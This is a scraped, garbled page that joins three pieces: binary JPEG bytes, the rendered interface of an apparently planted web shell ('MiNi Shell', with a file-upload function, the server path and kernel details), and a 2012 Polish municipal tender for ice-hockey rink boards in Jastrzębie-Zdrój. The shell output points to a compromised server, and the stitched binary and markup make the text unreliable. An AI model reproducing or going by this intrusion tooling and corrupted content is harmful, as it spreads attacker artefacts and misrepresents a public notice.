JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120515/156338-N-2012.html

<p class="kh_header"><b>Jastrzębie-Zdrój: Dostawa i montaż profesjonalnych band na obiekcie Lodowiska Jastor   w  Jastrzębiu -Zdroju     ul. Leśna,   44-335 Jastrzębie -Zdrój oraz dostawa miniband.</b><br>
<b>Numer ogłoszenia: 156338 - 2012; data zamieszczenia: 15.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , ul. Harcerska 14 B, 44-335 Jastrzębie-Zdrój, woj. śląskie, tel. 0-32 4718614 w. 21, faks 0-32 4718614 w. 36.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> mosir.xm.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> mosir.xm.pl ; bip.jastrzebie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż profesjonalnych band na obiekcie Lodowiska Jastor   w  Jastrzębiu -Zdroju     ul. Leśna,   44-335 Jastrzębie -Zdrój oraz dostawa miniband..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa i montaż profesjonalnych band na obiekcie Lodowiska Jastor    w  Jastrzębiu -Zdroju     ul. Leśna,   44-335 Jastrzębie -Zdrój oraz dostawa miniband. 

2.Wykonanie inwentaryzacji i dokumentacji powykonawczej. 
Dane techniczne:

Rozmiar lodowiska:							60 x 29 m
Kąt łuku lodowiska:							R8,5 m
Wejścia na lodowisko:							8 szt. szer. 1000 mm
Brama dla rolby:							1 szt. szer. 3000 mm
Wypełnienie płytami PE stabilizacja UV grubość 10 mm: 		kolor biały
Taśma odbojowa HMW- PE stabilizacja UV grubość10 mm:		barwa żółta, wys. 200 mm
Poręcz HMW-PE stabilizacja UV grubość 10 mm:				kolor niebieski
Osłona reklam z poliwęglanu sabilizacja UV:				grubość 3 mm
Zakrycie od strony widowni:						grubość 5 mm
Szkła ochronne hartowane grubość 12 mm:				1600/800 mm ponad bandę
Ławki graczy na podwyższeniu:						25300 x 3000 mm
Oszklenie na bokach boksów graczy:					grubość szkła 10 mm
Ławki kar oraz ławka sekretarza zawodów na podwyższeniu:	4 x 5,5 x 4 m, głębokość 1500 mm
Siatka ochronna nad szkłami PA 40/1,2 mm:				38 x 6 m - koloru khaki 


1.	Moduły band mają być wykonane w technologii dotychczasowych band tzn. w modułach o długości 3 m odpowiadającemu dotychczasowemu kotwieniu. Demontaż starych band nie jest przedmiotem przetargu.
2.	Nowe bandy muszą spełniać wymagania aktualnych przepisów IIHF. 
3.	Konstrukcja bandy oparta ma być  na podwójnej ramie o wysokości 1200 mm ze szkłami osadzonymi w górnej części bandy. 
4.	Szkła na górze mają być  połączone za pomocą przezroczystych łączników z poliwęglanu. 
5.	Szczeliny pomiędzy poszczególnymi szkłami powinny być zminimalizowane na max 5 mm. 
6.	Wysokość szkieł ochronnych za bramkami oraz na łukach wynosić ma 1600 mm ponad bandę, na części wzdłużnej wyniesie 800 mm. 
7.	W miejscu ławek zawodników szkieł ochronnych nie będzie.
8.	Osłona reklam, musi być tak zamontowana, żeby umożliwiała szybką wymianę. Górna i dolna część osłony reklamy ma być  zapuszczona w taśmę odbojową na dole i w poręcz na górze. Materiał łączący osłonę reklamy zastosowany ma być tylko po bokach. Osłony reklam muszą odpowiadać rozmiarom modułów band.
9.	Bandy mają być  zakryte od strony widowni włącznie z ławkami zawodników. Do zakrycia band od strony widowni użyte zostaną płyty PE koloru białego o grubości, co najmniej 5 mm. 
10.	Podwyższony podest dla strefy ławek zawodników ma mieć rozmiar 25300 mm długości i 3000 mm szerokości. 
11.	Końce obu stref ławek graczy mają być  zabudowane konstrukcją w takiej samej technologii jak bandy hokejowe. Oba końce strefy ławek graczy zaopatrzone mają być  w drzwiczki umożliwiające ewakuację. 
12.	Tylną ścianę strefy ławek graczy tworzyć ma ściana trybuny z widzami, do której mają być przymocowane szkła ochronne o wysokości równej wysokości szkieł ochronnych nad bandami za bramkami. 
13.	Szkła nad schodami wyjściowymi z tyłu do szatni mają odpowiadać od góry kształtem nachylenie trybun zgodnie z umieszczoną tam poręczą a od spodu będzie dostosowane kształtem do stopniowej konstrukcji trybuny. 
14.	Górna część szkieł ochronnych mają być połączone za pomocą przezroczystych łączników z poliwęglanu, tak samo jak szkła ochronne nad bandami. 
15.	W części dolnej szkła ochronne mają być  osadzone w konstrukcji tej samej technologii jak bandy hokejowe. 
16.	W skład dostawy band hokejowych wchodzić mają ławki do siedzenia dla zawodników o długości 2x 9 m. Ławki mają być wyposażone uchwyty na bidony do picia dla zawodników. Za ławkami do siedzenia mają być  umieszczony podest dla trenera. Wysokość podestu 200 mm. 
17.	Podwyższenie dla ławek graczy ma być  wykonane z profili cynkowanych żarowo. 
18.	Zasadnicza podłoga wykonana ma być  z odpornej na wilgoć foliowanej pokrywy o grubości 18 mm. Osłona gumowa podłogi nie jest przedmiotem dostawy.
19.	Ławki kar oraz ławka sekretarza zawodów mają być o rozmiarach 4 x 5,5 x 4 m, głębokość 1500 mm wykonane w technologii takiej samej jak bandy hokejowe. 
20.	Konstrukcja ławek kar oraz ławki sekretarza zawodów obudowana ma być płytami PE białego koloru o grub. 5 mm. 
21.	Szkła ochronne użyte do ograniczenia ławek kar oraz ławki sekretarza zawodów mają  mieć wysokość 1300 mm ponad konstrukcję i grubość 10 mm. 
22.	Ławka sekretarza zawodów ma być oddzielona od ławek kar zawodników konstrukcją z drzwiczkami z obu stron oraz drzwiami wyjściowymi w tylniej części. 
23.	Ławka sekretarza zawodów ma być zamknięta w górnej części przezroczystym sufitem z poliwęglanu.

Przedmiotem dostawy ma być również komplet części zapasowych - tzn. każdy rodzaj szkła po 1 szt.



Bandy do minihokeja ( minibandy )

Dane techniczne:
Wysokość bandy 500 mm
Szerokość bandy 110 mm
Długość poszczególnych modułów 3000 mm
Kąt łuku R2000 mm
Całkowita długość band do minihokeja wynosić powinna 38 m włącznie z łukami dla jednej konstrukcji.

1. Bandy mają być  wykonane ze spawanych profili. 
2. Całość konstrukcji ma być  ocynkowana żarowo. 
3. Górna część ma być  zaopatrzona w poręcz, która będzie wykonana z polietylenowej płyty o grubości 10 mm i szerokości 115 mm. Poręcz ma być koloru niebieskiego tak jak bandy do hokeja. 
4. Konstrukcja bandy do minihokeja ma być pokryta płytami z polietylenu o grubości 5 mm. 
5. Poszczególne moduły band do minihokeja mają umożliwiać łatwy montaż oraz łatwy demontaż.                     6. Zamontowane bandy do minihokeja muszą wytrzymywać uderzenia zawodników w czasie gry.                        7. Dopuszczalne jest mocowanie poszczególnych modułów ze sobą za pomocą śruby.                                       8. Niedopuszczalne jest mocowanie band do minihokeja za pomocą śrub do band hokejowych.                                        9.  Dostawca zapewni w ramach dostawy system do przechowywania band do minihokeja w czasie kiedy nie są one używane.


Plan graficzny  lodowiska stanowi załącznik nr 10 do SIWZ.
Rysunek - przekrój poprzeczny band o konstrukcji podwójnej ramy stanowi załącznik nr 11 do SIWZ


 Przy wycenie należy uwzględnić 
wykonanie odpowiednich zabezpieczeń bhp, barier ochronnych, 
uzgodnienia oraz zlecenie nadzorów branżowych ( w razie konieczności)
 wykonanie inwentaryzacji i dokumentacji powykonawczej, 
inne nie wymienione wyżej prace limitujące wykonanie inwestycji zgodnie z jej przeznaczeniem.

Warunki techniczne.
1.	Przedmiot zamówienia musi być wykonany w technologii zgodnej z warunkami wykonania i odbioru, sztuką budowlaną, przy zachowaniu optymalizacji wykonania.
2.	Do wykonania zadania będą użyte materiały posiadające atesty, certyfikaty, dopuszczenie do stosowania, nie posiadające uszkodzeń. Przed zabudowaniem materiałów Wykonawca winien uzyskać ich zatwierdzenie przez Inspektora Nadzoru.
3.	Za wypadki i szkody powstałe na placu budowy odpowiada Wykonawca. Odpowiedzialność cywilną wobec osób trzecich jak i z tytułu zdarzeń losowych przyjmuje na siebie oferent - wykonawca.
4.	Wykonawca jest zobowiązany przestrzegać rygorów wynikających z Prawa budowlanego.
5.	Przed odbiorem końcowym Wykonawca zobowiązany jest dostarczyć karty przekazania odpadów na materiały oddane do utylizacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.23-5, 45.21.22.11-8, 45.40.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 49.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1)  spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 Pzp,
 2) wykażą brak podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wiedzy i doświadczenia: 
- wykonawca w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 roboty związane z dostawą i montażem profesjonalnych band posiadających certyfikat IIHF na lodowiskach, na których prowadzone są rozgrywki ligowe najwyższych grup rozgrywkowych pod egidą IIHF  w Europie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie osób zdolnych do wykonania zamówienia: 
    wykonawca dysponuje lub będzie dysponować przy wykonywanych pracach          osobami  posiadającymi uprawnienia niezbędne do wykonywania prac określonych w dokumentacji technicznej, wymagane przepisami Prawo budowlane tj. uprawnienia budowlane o specjalności konstrukcyjno-budowlanej bez ograniczeń osoby przyjmującej obowiązki kierownika budowy lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>załączniki do siwz w tym formularz oferty, wzór umowy i inne oświadczenia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> mosir.xm.pl ; bip.jastrzebie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji ul. Harcerska 14b, 44-335 Jastrzębie-Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2012 godzina 13:00, miejsce: Miejski Ośrodek Sportu i Rekreacji ul. Harcerska 14b, 44-335 Jastrzębie-Zdrój pok.12 budynek b.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com